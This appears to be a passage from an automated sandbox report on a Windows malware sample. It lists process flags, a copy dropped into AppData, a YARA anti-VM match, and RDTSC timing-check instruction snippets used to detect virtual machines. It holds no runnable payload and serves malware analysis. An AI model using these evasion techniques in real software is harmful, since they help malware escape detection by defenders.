Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: CZyOWoN2hiszA6d.exe PID: 1076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dacYzRiJuWECy.exe PID: 7300, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\cmstp.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 2C09904 second address: 2C0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe	RDTSC instruction interceptor: First address: 2C09B6E second address: 2C09B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 129904 second address: 12990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 129B6E second address: 129B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: 4A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: 73C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: 6DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: 83C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: 93C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: 9850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: A860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Memory allocated: B860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: 22C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: 2480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: 4480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: 6E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: 67B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: 7E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: 8E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: 92A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: A2A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Memory allocated: B2A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Code function: 9_2_00409AA0 rdtsc

9_2_00409AA0

